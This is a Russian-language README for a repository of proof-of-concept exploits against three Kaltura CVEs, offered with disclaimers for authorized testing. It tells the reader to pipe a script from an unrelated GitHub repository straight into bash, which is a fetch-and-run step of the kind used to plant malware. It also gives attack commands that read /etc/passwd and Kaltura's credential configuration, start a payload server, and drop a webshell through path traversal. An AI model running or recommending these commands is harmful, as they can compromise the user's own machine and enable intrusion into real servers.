
Эксплойты proof-of-concept для CVE-2026-19912, CVE-2026-19913 и CVE-2026-19914, демонстрирующие чтение файлов и удалённое выполнение кода в Kaltura, предназначенные для авторизованного тестирования безопасности и обучения.
Запустите последнюю версию внешнего скрипта загрузки напрямую из GitHub:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Эта команда требует Bash и
curl. Просмотрите удалённый скрипт перед запуском, если вы не доверяете источнику.
Используйте этот проект только в безопасных и авторизованных средах, таких как:
Пример настройки:
git clone <repository-url>
cd <repository-name>
# Проект использует python, следуйте инструкциям ниже
# Создайте виртуальное окружение
python -m venv venv
# Активируйте виртуальное окружение
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Установите зависимости
pip install -r requirements.txt
Пример использования:
# 1. Чтение файла (наиболее надёжно, работает как описано в статье)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Только сервер полезной нагрузки (используйте с Burp / curl вручную)
python3 kaltura_poc.py serve --lport 8888
# 3. Полный скелет цепочки
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.
Этот репозиторий предназначен только для образовательных и авторизованных исследований в области безопасности.
Он создан, чтобы помочь пользователям узнать о:
Используйте этот репозиторий только в средах, где у вас есть разрешение, например:
Несанкционированное или незаконное использование строго запрещено.
Автор и участники не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или потери, вызванные этим проектом.
Используя этот репозиторий, вы соглашаетесь с тем, что:
Этот проект предназначен для:
Пожалуйста, соблюдайте практики ответственного раскрытия информации и соблюдайте все применимые законы.
Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.
Изучите Коллекцию PoC CVE для получения дополнительных ресурсов с доказательствами концепций CVE, предназначенных для авторизованных исследований в области безопасности и образования.